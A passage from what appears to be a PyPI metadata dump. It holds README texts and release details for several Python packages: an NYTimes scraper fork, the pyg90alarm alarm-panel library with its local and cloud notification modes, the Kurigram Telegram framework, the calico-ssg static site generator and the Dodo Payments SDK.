│ ├── corr_coeff(x: typing.Union[list, tuple], y: typing.Union[list, tuple]) -> typing.Union[int, float, complex]
│ ├── cos(x: t | text/markdown | Shen Jiayi | 2261748025@qq.com | null | null | AGPLv3 | math, 数学, mathematics, 数学计算, numerical, 数值, computation, 计算, scientific, 科学, algebra, 代数, calculus, 微积分, statistics, 统计, linear-algebra, 线性代数, optimization, 优化, numerical-analysis, 数值分析, matrix, 矩阵, vector, 向量, tensor, 张量, numerics, 数值计算, library, 库, tools, 工具, utils, 实用程序, algorithms, 算法, software, 软件, package, 包, methods, 方法, data-science, 数据科学, machine-learning, 机器学习, computational, 计算的, operations, 操作, functions, 函数, processing, 处理, programming, 编程, simulation, 仿真, visualization, 可视化, physics, 物理 | [] | [] | https://github.com/PythonSJL/PyPyNum | null | >=3.5 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.10 | 2026-02-20T09:36:34.405338 | pypynum-1.18.0.tar.gz | 178,608 | 75/4e/dbdd9f0c4e487183bf9011dfaa2dd64328575016bff98cf2446441ab8296/pypynum-1.18.0.tar.gz | source | sdist | null | false | 3f2aad616369697b66c90e24b18d47a6 | 1ef637b97bcc57d33d5984f0e69a274db14d34c9366841d455d5f40065c56c4d | 754edbdd9f0c4e487183bf9011dfaa2dd64328575016bff98cf2446441ab8296 | null | [] | 0 |
2.4 | nytimes-scraper-fork | 1.1.3.dev4 | Scrape article metadata and comments from NYTimes | # nytimes-scraper
[](https://pypi.org/project/nytimes-scraper/)
Scrape article metadata and comments from NYTimes
## Setup
```bash
pip install nytimes-scraper
```
## CLI usage
The scraper will automatically fetch every article and all the user comments published on
[nytimes.com](https://www.nytimes.com/).
Articles are processed month by month, starting with the current month.
For each month, a `{year}-{month}-articles.pickle` and `{year}-{month}-comments.pickle` will be
generated in the current directory.
If the process is restarted, existing outputs will not be overridden and the scraper will continue
at the month where it left off.
To use it, run
```bash
python -m nytimes_scraper <API_KEY>
```
## Programmatic usage
The scraper can also be started programmatically
```python
import datetime as dt
from nytimes_scraper import run_scraper, scrape_month
# scrape february of 2020
article_df, comment_df = scrape_month('<your_api_key>', date=dt.date(2020, 2, 1))
# scrape all articles month by month
run_scraper('<your_api_key>')
```
Alternatively, the `nytimes_scraper.articles` and `nytimes_scraper.comments` modules can be used for more
fine-grained access:
```python
import datetime as dt
from nytimes_scraper.nyt_api import NytApi
from nytimes_scraper.articles import fetch_articles_by_month, articles_to_df
from nytimes_scraper.comments import fetch_comments, fetch_comments_by_article, comments_to_df
api = NytApi('<your_api_key>')
# Fetch articles of a specific month
articles = fetch_articles_by_month(api, dt.date(2020, 2, 1))
article_df = articles_to_df(articles)
# Fetch comments from multiple articles
# a) using the results of a previous article query
article_ids_and_urls = list(article_df['web_url'].iteritems())
comments_a = fetch_comments(api, article_ids_and_urls)
comment_df = comments_to_df(comments_a)
# b) using a custom list of articles
comments_b = fetch_comments(api, article_ids_and_urls=[
('nyt://article/316ef65c-7021-5755-885c-a9e1ef2cfdf2', 'https://www.nytimes.com/2020/01/03/world/middleeast/trump-iran-suleimani.html'),
('nyt://article/b2d1b802-412e-51f7-8864-efc931e87bb3', 'https://www.nytimes.com/2020/01/04/opinion/impeachment-witnesses.html'),
])
# Fetch comment for one specific article by its URL
comments_c = fetch_comments_by_article(api, 'https://www.nytimes.com/2019/11/30/opinion/sunday/bernie-sanders.html')
```
| text/markdown | Tim Pietz | tim@pietz.me | null | null | MIT | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8"
] | [] | https://github.com/ietz/nytimes-scraper | null | null | [] | [] | [] | [
"cssselect",
"fire",
"lxml",
"requests",
"tqdm"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.1 | 2026-02-20T09:36:22.346685 | nytimes_scraper_fork-1.1.3.dev4.tar.gz | 6,404 | e3/ca/be2e4b4f29c947064b7b6bf26cbf1854bf0acf4f9a56d7e5faa6ca38e23e/nytimes_scraper_fork-1.1.3.dev4.tar.gz | source | sdist | null | false | 01ca6c2fa8ee92239211f308e1098657 | 52134d62414cb5b8f54fddd38242ea20701f20509a42659e2a759e754660ea2c | e3cabe2e4b4f29c947064b7b6bf26cbf1854bf0acf4f9a56d7e5faa6ca38e23e | null | [] | 197 |
2.4 | pyg90alarm | 2.7.3 | G90 Alarm system protocol | .. image:: https://github.com/hostcc/pyg90alarm/actions/workflows/main.yml/badge.svg?branch=master
:target: https://github.com/hostcc/pyg90alarm/tree/master
:alt: Github workflow status
.. image:: https://readthedocs.org/projects/pyg90alarm/badge/?version=stable
:target: https://pyg90alarm.readthedocs.io/en/stable
:alt: ReadTheDocs status
.. image:: https://img.shields.io/github/v/release/hostcc/pyg90alarm
:target: https://github.com/hostcc/pyg90alarm/releases/latest
:alt: Latest GitHub release
.. image:: https://img.shields.io/pypi/v/pyg90alarm
:target: https://pypi.org/project/pyg90alarm/
:alt: Latest PyPI version
Description
===========
Python package to control G90-based alarm systems.
Many manufacturers sell such systems under different brands - Golden Security,
PST, Kerui and others. Those are cheap low-end systems, typically equipped with
WiFi and possible GSM interfaces for connectivity, and support different range
of peripherals:
* Wired and wireless sensors
* Relays (switches)
... and probably others
The package implements asynchronous I/O over most of code paths using
`asyncio <https://docs.python.org/3/library/asyncio.html>`_.
Disclaimer
==========
The author has no affiliation or any relationship to any of the hardware
vendors in question. The code has been created upon many trial and error
iterations.
Motivation
==========
The primary motivation creating the code is the comfort of using the security
system - the mobile applications provided by the vendor, called "Carener", is
slow and crashes sometimes. Instead, it would be awesome to have the system
integrated into larger ecosystems, like Home Assistant, HomeKit and such.
Hence, the code has been created to interact with the security system using
Python, and it opens up a way for further integrations.
Supported hardware
==================
It might not be possible to list every system supported by the package due to
manufacturers naming the products differently. Here is the list of hardware
known to work with the package:
* `PST G90B Plus <http://www.cameralarms.com/products/auto_dial_alarm_system/185.html>`_
And the list of sensors, actual set of device should be notable larger as many
of other manufacturers produce similar items. The names in parenthesis are
taken from the alarm system documentation, for example, `Home Alarm GB90-Plus <https://archive.org/details/HomeAlarmGB90-Plus/G90B%20plus%20WIFIGSMGPRS%20alarm%20system%20user%20manual/page/n7/mode/2up>`_.
* Wired PIR sensors
* Wireless PIR sensors (WPD01, WMS08)
* Door/window sensors (WDS07, WRDS01)
* Water leak sensors (LSTC01)
* Smoke sensors (WSD02)
* Gas sensors (WGD01)
* Switches/relays (JDQ)
Basically, the alarm system uses 433 MHz communications for the wireless
devices using EV1527, PT2262 protocols. The mobile application also mentions
some devices using 2.4GHz, although details of the protocols haven't been
identified as no such hardware has been available for experimentation.
Known caveats
=============
* Wireless shutter sensor (WRDS01) doesn't send anything on sensor closed, only
when opened. In contrast, WDS07 wireless door sensor does both.
* Wireless relays (at least JDQ) use same RF code for switching on and off,
when configured in toggle mode. That means a RF signal repeater will make
controlling such relays unpredictable, since the code will be sent more than
once.
* Low battery notifications for wireless sensors (at least for WDS07 and WSD02)
are often missing, either due to the sensors not sending them or the device
doesn't receive those.
* Wired sensors toggle on line state change, i.e. those aren't limited to have
normal closed (NC) or normal open (NO) contacts only. Best used with NC
contact sensors though, since an intruder cutting the line will trigger the
alarm.
Device notifications
====================
Local notifications
-------------------
There is a hidden device capability to send protocol notifications over the
WiFi interface, thus called local. The notifications are done using broadcast UDP packets with source/destination ports being ``45000:12901`` (non-configurable), and sent when the device has IP address of its WiFi interface set to ``10.10.10.250``. That is the same IP the device will allocate to the WiFi interface when AP (access point is enabled). Please note enabling the AP *is not* required for the notifications to be sent, only the IP address matters. Likely the firmware does a check internally and enables those when corresponding IP address is found on the WiFi interface.
Depending on your network setup, ensuring the `10.10.10.250` IP address is
allocated to the WiFi interface of the device might be as simple as DHCP
reservation. Please check the documentation of your networking gear on how to
set the IP address allocation up.
.. note:: Since the IP address trick above isn't something the device exposes
to the user, the functionality might change or even cease functioning upon a
firmware upgrade!
.. note:: The device notifications in question are fully local with no
dependency on the cloud or Internet connection on the device.
.. note:: If IP address trick doesn't work for you by a reason, the package
will still be able to perform the key functions - for example, arming or
disarming the panel, or reading the list of sensors. However, the sensor
status will not be reflected and those will always be reported as inactive,
since there is no way to read their state in a polled manner.
To work that limitation around the package now supports simulating device
notifications from periodically polling the history it records - the
simulation works only for the alerts, not notifications (e.g. notifications
include low battery events and alike). This also requires the particular
alert to be enabled in the mobile application, otherwise it won't be
recorded in the history.
For the local notifications to be enabled the ``G90Alarm.use_local_notifications()`` needs to be called upon constructing an instance of ``G90Alarm`` class, then ``G90Alarm.listen_notifications()`` to start processing those coming from the panel - the code fragment below demonstrates that though being incomplete since callbacks (e.g. ``G90Alarm.on_armdisarm()``) should be set for the actual processing of the notifications.
.. code:: python
from pyg90alarm import G90Alarm
# Create an instance of the alarm panel
alarm = G90Alarm(host='10.10.10.250')
# Enable local notifications
await alarm.use_local_notifications()
# Start listening for notifications
await alarm.listen_notifications()
Cloud notifications
-------------------
The cloud protocol is native to the panel and is used to interact with mobile application. The package can mimic the cloud server and interpret the messages the panel sends to the cloud, allowing to receive the notifications and alerts.
While the protocol also allows to send commands to the panel, it is not implemented and local protocol is used for that - i.e. when cloud notifications are in use the local protocol still utilized for sending commands to the panel.
The cloud protocol is TCP based and typically interacts with cloud service at known IP address and port, which could be customized. To process the cloud notifications all the traffic from panel towards the configured IP address service needs to be received by the node where the package is running.
Please see
`the section <docs/cloud-protocol.rst>`_ for further details on the protocol.
The benefit of the cloud notifications is that the panel no longer required to have ``10.10.10.250`` IP address.
The package could act as:
- Standalone cloud server with no Internet connectivity or cloud service
required at all - good if you'd like to avoid having a vendor service involved. Please note the mobile application will show panel as offline in this mode
- Chained cloud server, where in addition to interpreting the notifications it
will also forward all packets received from the panel to the cloud server, and pass its responses back to the panel. This allows to have notifications processed by the package and the mobile application working as well.
The code fragments below demonstrate how to utilize both modes - please note those are incomplete, since no callbacks are set to process the notifications.
**Standalone mode**
.. code:: python
from pyg90alarm import G90Alarm
# Create an instance of the alarm panel
alarm = G90Alarm(host='<panel IP address>')
# Configure cloud server address the panel should use - the host running the
# package.
await alarm.set_cloud_server_address(
cloud_ip='<host IP address running the package>', cloud_port=5678
)
# Enable cloud notifications
await alarm.use_cloud_notifications(
# The host/port the package will listen on for the cloud notifications,
# should match ones above.
cloud_ip='<host IP address running the package>',
cloud_port=5678,
cloud_local_port=5678,
upstream_host=None
)
# Start listening for notifications
await alarm.listen_notifications()
**Chained mode**
.. code:: python
from pyg90alarm import G90Alarm
# Create an instance of the alarm panel
alarm = G90Alarm(host='<panel IP address>')
# Configure cloud server address the panel should use - the host running the
# package.
await alarm.set_cloud_server_address(
cloud_ip='<host IP address running the package>', cloud_port=5678
)
# Enable cloud notifications
await alarm.use_cloud_notifications(
# The host/port the package will listen on for the cloud notifications,
# should match ones above.
cloud_ip='<host IP address running the package>',
cloud_port=5678,
cloud_local_port=5678,
# Upstream cloud server address the package should forward the
# notifications to.
upstream_host='47.88.7.61',
upstream_port=5678
)
# Start listening for notifications
await alarm.listen_notifications()
Quick start
===========
.. code:: shell
pip install pyg90alarm
Documentation
=============
Please see `online documentation <https://pyg90alarm.readthedocs.io>`_ for
details on the protocol, its security, supported commands and the API package
provides.
| text/x-rst | Ilia Sotnikov | hostcc@gmail.com | null | null | null | g90, alarm, protocol | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Home Automation",
"Topic :: System :: Hardware",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3 :: Only"
] | [] | https://github.com/hostcc/pyg90alarm | null | <4,>=3.9 | [] | [] | [] | [
"check-manifest; extra == \"dev\"",
"coverage; extra == \"test\"",
"asynctest; extra == \"test\"",
"sphinx; extra == \"docs\"",
"sphinx-rtd-theme; extra == \"docs\""
] | [] | [] | [] | [
"Bug Reports, https://github.com/hostcc/pyg90alarm/issues",
"Source, https://github.com/hostcc/pyg90alarm/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:36:18.758338 | pyg90alarm-2.7.3.tar.gz | 121,106 | 93/88/e70759bcfa283baad11e9d4278fa0f860f6b8b78b630167361a5f97a3fac/pyg90alarm-2.7.3.tar.gz | source | sdist | null | false | a0a3ec914d264e19f0295ac4cad2513b | fa4653e4f760fa632fd86b2771f4430e2ddf21bb45069db4607c8602fe703793 | 9388e70759bcfa283baad11e9d4278fa0f860f6b8b78b630167361a5f97a3fac | null | [
"LICENSE"
] | 273 |
2.4 | Kurigram | 2.2.19 | Elegant, modern and asynchronous Telegram MTProto API framework in Python for users and bots | <p align="center">
<a href="https://github.com/KurimuzonAkuma/pyrogram">
<img src="https://raw.githubusercontent.com/KurimuzonAkuma/kurigramartwork/master/kurigram-logo.png" alt="Pyrogram" width="128">
</a>
<br>
<b>Telegram MTProto API Framework for Python</b>
<br>
<a href="https://kurigram.icu">
Homepage
</a>
•
<a href="https://docs.kurigram.icu">
Documentation
</a>
•
<a href="https://t.me/kurigram_news">
News
</a>
•
<a href="https://t.me/kurigram_chat">
Chat
</a>
</p>
## Pyrogram
> Elegant, modern and asynchronous Telegram MTProto API framework in Python for users and bots
``` python
from pyrogram import Client, filters
app = Client("my_account")
@app.on_message(filters.private)
async def hello(client, message):
await message.reply("Hello from Pyrogram!")
app.run()
```
**Pyrogram** is a modern, elegant and asynchronous [MTProto API](https://docs.kurigram.icu/topics/mtproto-vs-botapi)
framework. It enables you to easily interact with the main Telegram API through a user account (custom client) or a bot
identity (bot API alternative) using Python.
### Support
If you'd like to support my fork, you can consider:
- `kurimuzonakuma.ton` - TON
- `TCbZ7CSpTvTJ6rno2eoWWYBx7hmYF75wk3` - USDT TRC20
### Key Features
- **Ready**: Install Pyrogram with pip and start building your applications right away.
- **Easy**: Makes the Telegram API simple and intuitive, while still allowing advanced usages.
- **Elegant**: Low-level details are abstracted and re-presented in a more convenient way.
- **Fast**: Boosted up by [TgCrypto](https://github.com/pyrogram/tgcrypto), a high-performance cryptography library written in C.
- **Type-hinted**: Types and methods are all type-hinted, enabling excellent editor support.
- **Async**: Fully asynchronous (also usable synchronously if wanted, for convenience).
- **Powerful**: Full access to Telegram's API to execute any official client action and more.
### Installing
Stable version
``` bash
pip3 install kurigram
```
Dev version
``` bash
pip3 install https://github.com/KurimuzonAkuma/kurigram/archive/dev.zip --force-reinstall
```
### Resources
- Check out the [docs](https://docs.kurigram.icu) to learn more about Pyrogram, get started right
away and discover more in-depth material for building your client applications.
- Join the [official channel](https://t.me/kurigram_news) and stay tuned for news, updates and announcements.
- Join the [official chat](https://t.me/kurigram_chat) to communicate with people.
| text/markdown | null | Dan <dan@pyrogram.org> | KurimuzonAkuma | null | null | api, chat, client, library, messenger, mtproto, python, telegram | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Communications",
"Topic :: Communications :: Chat",
"Topic :: Internet",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"pyaes<=1.6.1",
"pysocks<=1.7.1",
"hatch<=1.16.2; extra == \"dev\"",
"keyring<=25.7.0; extra == \"dev\"",
"pytest-asyncio<=1.3.0; extra == \"dev\"",
"pytest-cov<=7.0.0; extra == \"dev\"",
"pytest<=9.0.2; extra == \"dev\"",
"twine<=6.2.0; extra == \"dev\"",
"pygments<=2.19.2; extra == \"docs\"",
"shibuya<=2025.12.19; extra == \"docs\"",
"sphinx-autobuild<=2025.8.25; extra == \"docs\"",
"sphinx-copybutton<=0.5.2; extra == \"docs\"",
"sphinx-design<=0.6.1; extra == \"docs\"",
"sphinx-iconify<=0.2.1; extra == \"docs\"",
"sphinx<=9.0.4; extra == \"docs\"",
"tgcrypto<=1.2.5; extra == \"fast\"",
"uvloop<=0.21.0; (sys_platform == \"darwin\" or sys_platform == \"linux\") and extra == \"fast\""
] | [] | [] | [] | [
"Homepage, https://kurigram.icu",
"Documentation, https://docs.kurigram.icu",
"Source, https://github.com/KurimuzonAkuma/pyrogram",
"Issues, https://github.com/KurimuzonAkuma/pyrogram/issues",
"Community, https://t.me/kurigram_chat"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:36:08.844805 | kurigram-2.2.19.tar.gz | 557,685 | aa/3c/0c5469b66ea5ad887d7b877b08113726e6d67ef622442c8dd7adbcf9e352/kurigram-2.2.19.tar.gz | source | sdist | null | false | 591c4aa932d5afd9dcbd22aafc9896b3 | 6d86a870834527e91c6308f8307796a985a437a39e8112e3bc7a649c6d1f7daa | aa3c0c5469b66ea5ad887d7b877b08113726e6d67ef622442c8dd7adbcf9e352 | LGPL-3.0-or-later | [
"COPYING",
"COPYING.lesser"
] | 0 |
2.4 | calico-ssg | 0.4.2 | Django-based static site generator | # Calico - Django-based Static Site Generator
Calico is a powerful static site generator built on top of Django, combining the flexibility of Django's templating system with the simplicity and performance of static websites.
## Features
- **Django-powered**: Leverage Django's robust templating engine and ecosystem
- **Plugin System**: Extensible architecture using pluggy (via djp)
- **Widget-based Components**: Modular, reusable UI components
- **Multiple Themes**: Built-in PicoCSS theme with support for custom themes
- **Blog System**: Full-featured blog plugin with categories, tags, and RSS
- **Collections**: Organize and display grouped content
- **Development Server**: Live-reload development environment
- **Search Support**: Built-in search functionality with lunr.js
## Installation
```bash
pip install calico-ssg
```
Or install from source:
```bash
git clone https://codeberg.org/emmaDelescolle/calico.git
cd calico
pip install -e .
```
## Quick Start
1. **Initialize a new site**:
```bash
calico init
```
2. **Start the development server**:
```bash
calico run
```
3. **Build your static site**:
```bash
calico build
```
## Creating Content
Content in Calico is written in Markdown with YAML frontmatter:
```markdown
---
title: My First Post
date: 2024-01-15
tags: [introduction, calico]
---
# Welcome to My Site
This is my first post using Calico!
```
## Plugin Development
Create custom plugins to extend Calico's functionality:
```bash
calico start_plugin my_plugin
```
Plugins can hook into various aspects of the build process:
- Add template tags and filters
- Register themes and templates
- Include CSS and JavaScript
- Define custom content collections
- Add context processors
## Project Structure
```
my-site/
\x00\x00 content/ # Markdown content files
\x00\x00 static/ # Static assets (images, css, js)
\x00\x00 templates/ # Custom templates
\x00\x00 plugins/ # Local plugins
\x00\x00 config.yml # Site configuration
```
## Documentation
For detailed documentation, visit [https://calico-ssg.com/docs/index.html](https://calico-ssg.com/docs/index.html).
## Contributing
Contributions are welcome! Please feel free to submit issues and pull requests to the [Calico repository](https://codeberg.org/emmaDelescolle/calico).
## License
Calico is distributed under the MIT License.
## Links
- **Documentation**: [https://calico-ssg.com/docs/index.html](https://calico-ssg.com/docs/index.html)
- **Source Code**: [https://codeberg.org/emmaDelescolle/calico](https://codeberg.org/emmaDelescolle/calico)
- **Issue Tracker**: [https://codeberg.org/emmaDelescolle/calico/issues](https://codeberg.org/emmaDelescolle/calico/issues)
| text/markdown | LevIT SCS | LevIT SCS <info@levit.be> | null | null | null | null | [
"Environment :: Web Environment",
"Framework :: Django",
"Framework :: Django :: 4.2",
"Framework :: Django :: 5.0",
"Framework :: Django :: 5.1",
"Framework :: Django :: 5.2",
"Framework :: Django :: 6.0",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content"
] | [] | https://codeberg.org/emmaDelescolle/calico | null | null | [] | [] | [] | [
"click>=8.1.7",
"Django<6.2,>=4.2",
"django-browser-reload>=1.16.0",
"django-distill>=3.2.4",
"django-markdown-deux>=1.0.6",
"django-templateyak>=0.0.2",
"djp>=0.3.1",
"dj_angles>=0.10.0",
"nanodjango>=0.9.2",
"pillow==10.4.0",
"python-dotenv>=1.0.1",
"python-frontmatter>=1.1.0",
"readtime==3.0.0",
"lunr>=0.6.2",
"tox>=4.0; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"pytest-cov>=4.1; extra == \"dev\"",
"pytest-xdist>=3.5; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://calico-ssg.com",
"Documentation, https://calico-ssg.com/docs/index.html",
"Repository, https://codeberg.org/emmaDelescolle/calico",
"Bug Tracker, https://codeberg.org/emmaDelescolle/calico/issues"
] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T09:35:43.156557 | calico_ssg-0.4.2.tar.gz | 59,383 | 78/e8/46004be0db683aa3aa85f22b1d3103ff6a9db972ffad55bc0b01ba686a7d/calico_ssg-0.4.2.tar.gz | source | sdist | null | false | 1883dd56936c2575b6ad3b73d523b00e | 0fd1d8adb9b18e377f7474a1c2fa7912eac6783ae5d8bb7b523e923b79dc1e82 | 78e846004be0db683aa3aa85f22b1d3103ff6a9db972ffad55bc0b01ba686a7d | null | [
"LICENSE.md"
] | 220 |
2.3 | dodopayments | 1.84.0 | The official Python library for the Dodo Payments API | # Dodo Payments Python API library
<!-- prettier-ignore -->
[)](https://pypi.org/project/dodopayments/)
The [Dodo Payments](https://dodopayments.com) Python library provides convenient access to the Dodo Payments REST API from any Python 3.8+
application. The library includes type definitions for all request params and response fields,
and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx).
It is generated with [Stainless](https://www.stainless.com/).
## MCP Server
Use the Dodo Payments MCP Server to enable AI assistants to interact with this API, allowing them to explore endpoints, make test requests, and use documentation to help integrate this SDK into your application.
[](https://cursor.com/en-US/install-mcp?name=dodopayments-mcp&config=eyJjb21tYW5kIjoibnB4IiwiYXJncyI6WyIteSIsImRvZG9wYXltZW50cy1tY3AiXSwiZW52Ijp7IkRPRE9fUEFZTUVOVFNfQVBJX0tFWSI6Ik15IEJlYXJlciBUb2tlbiIsIkRPRE9fUEFZTUVOVFNfV0VCSE9PS19LRVkiOiJNeSBXZWJob29rIEtleSJ9fQ)
[](https://vscode.stainless.com/mcp/%7B%22name%22%3A%22dodopayments-mcp%22%2C%22command%22%3A%22npx%22%2C%22args%22%3A%5B%22-y%22%2C%22dodopayments-mcp%22%5D%2C%22env%22%3A%7B%22DODO_PAYMENTS_API_KEY%22%3A%22My%20Bearer%20Token%22%2C%22DODO_PAYMENTS_WEBHOOK_KEY%22%3A%22My%20Webhook%20Key%22%7D%7D)
> Note: You may need to set environment variables in your MCP client.
## Documentation
The REST API documentation can be found on [docs.dodopayments.com](https://docs.dodopayments.com/api-reference/introduction). The full API of this library can be found in [api.md](https://github.com/dodopayments/dodopayments-python/tree/main/api.md).
## Installation
```sh
# install from PyPI
pip install dodopayments
```
## Usage
The full API of this library can be found in [api.md](https://github.com/dodopayments/dodopayments-python/tree/main/api.md).
```python
import os
from dodopayments import DodoPayments
client = DodoPayments(
bearer_token=os.environ.get("DODO_PAYMENTS_API_KEY"), # This is the default and can be omitted
# defaults to "live_mode".
environment="test_mode",
)
checkout_session_response = client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
print(checkout_session_response.session_id)
```
While you can provide a `bearer_token` keyword argument,
we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/)
to add `DODO_PAYMENTS_API_KEY="My Bearer Token"` to your `.env` file
so that your Bearer Token is not stored in source control.
## Async usage
Simply import `AsyncDodoPayments` instead of `DodoPayments` and use `await` with each API call:
```python
import os
import asyncio
from dodopayments import AsyncDodoPayments
client = AsyncDodoPayments(
bearer_token=os.environ.get("DODO_PAYMENTS_API_KEY"), # This is the default and can be omitted
# defaults to "live_mode".
environment="test_mode",
)
async def main() -> None:
checkout_session_response = await client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
print(checkout_session_response.session_id)
asyncio.run(main())
```
Functionality between the synchronous and asynchronous clients is otherwise identical.
### With aiohttp
By default, the async client uses `httpx` for HTTP requests. However, for improved concurrency performance you may also use `aiohttp` as the HTTP backend.
You can enable this by installing `aiohttp`:
```sh
# install from PyPI
pip install dodopayments[aiohttp]
```
Then you can enable it by instantiating the client with `http_client=DefaultAioHttpClient()`:
```python
import os
import asyncio
from dodopayments import DefaultAioHttpClient
from dodopayments import AsyncDodoPayments
async def main() -> None:
async with AsyncDodoPayments(
bearer_token=os.environ.get(
"DODO_PAYMENTS_API_KEY"
), # This is the default and can be omitted
http_client=DefaultAioHttpClient(),
) as client:
checkout_session_response = await client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
print(checkout_session_response.session_id)
asyncio.run(main())
```
## Using types
Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like:
- Serializing back into JSON, `model.to_json()`
- Converting to a dictionary, `model.to_dict()`
Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`.
## Pagination
List methods in the Dodo Payments API are paginated.
This library provides auto-paginating iterators with each list response, so you do not have to request successive pages manually:
```python
from dodopayments import DodoPayments
client = DodoPayments()
all_payments = []
# Automatically fetches more pages as needed.
for payment in client.payments.list():
# Do something with payment here
all_payments.append(payment)
print(all_payments)
```
Or, asynchronously:
```python
import asyncio
from dodopayments import AsyncDodoPayments
client = AsyncDodoPayments()
async def main() -> None:
all_payments = []
# Iterate through items across all pages, issuing requests as needed.
async for payment in client.payments.list():
all_payments.append(payment)
print(all_payments)
asyncio.run(main())
```
Alternatively, you can use the `.has_next_page()`, `.next_page_info()`, or `.get_next_page()` methods for more granular control working with pages:
```python
first_page = await client.payments.list()
if first_page.has_next_page():
print(f"will fetch next page using these details: {first_page.next_page_info()}")
next_page = await first_page.get_next_page()
print(f"number of items we just fetched: {len(next_page.items)}")
# Remove `await` for non-async usage.
```
Or just work directly with the returned data:
```python
first_page = await client.payments.list()
for payment in first_page.items:
print(payment.brand_id)
# Remove `await` for non-async usage.
```
## Nested params
Nested parameters are dictionaries, typed using `TypedDict`, for example:
```python
from dodopayments import DodoPayments
client = DodoPayments()
checkout_session_response = client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
billing_address={"country": "AF"},
)
print(checkout_session_response.billing_address)
```
## Handling errors
When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `dodopayments.APIConnectionError` is raised.
When the API returns a non-success status code (that is, 4xx or 5xx
response), a subclass of `dodopayments.APIStatusError` is raised, containing `status_code` and `response` properties.
All errors inherit from `dodopayments.APIError`.
```python
import dodopayments
from dodopayments import DodoPayments
client = DodoPayments()
try:
client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
except dodopayments.APIConnectionError as e:
print("The server could not be reached")
print(e.__cause__) # an underlying Exception, likely raised within httpx.
except dodopayments.RateLimitError as e:
print("A 429 status code was received; we should back off a bit.")
except dodopayments.APIStatusError as e:
print("Another non-200-range status code was received")
print(e.status_code)
print(e.response)
```
Error codes are as follows:
| Status Code | Error Type |
| ----------- | -------------------------- |
| 400 | `BadRequestError` |
| 401 | `AuthenticationError` |
| 403 | `PermissionDeniedError` |
| 404 | `NotFoundError` |
| 422 | `UnprocessableEntityError` |
| 429 | `RateLimitError` |
| >=500 | `InternalServerError` |
| N/A | `APIConnectionError` |
### Retries
Certain errors are automatically retried 2 times by default, with a short exponential backoff.
Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict,
429 Rate Limit, and >=500 Internal errors are all retried by default.
You can use the `max_retries` option to configure or disable retry settings:
```python
from dodopayments import DodoPayments
# Configure the default for all requests:
client = DodoPayments(
# default is 2
max_retries=0,
)
# Or, configure per-request:
client.with_options(max_retries=5).checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
```
### Timeouts
By default requests time out after 1 minute. You can configure this with a `timeout` option,
which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object:
```python
from dodopayments import DodoPayments
# Configure the default for all requests:
client = DodoPayments(
# 20 seconds (default is 1 minute)
timeout=20.0,
)
# More granular control:
client = DodoPayments(
timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0),
)
# Override per-request:
client.with_options(timeout=5.0).checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
```
On timeout, an `APITimeoutError` is thrown.
Note that requests that time out are [retried twice by default](https://github.com/dodopayments/dodopayments-python/tree/main/#retries).
## Advanced
### Logging
We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module.
You can enable logging by setting the environment variable `DODO_PAYMENTS_LOG` to `info`.
```shell
$ export DODO_PAYMENTS_LOG=info
```
Or to `debug` for more verbose logging.
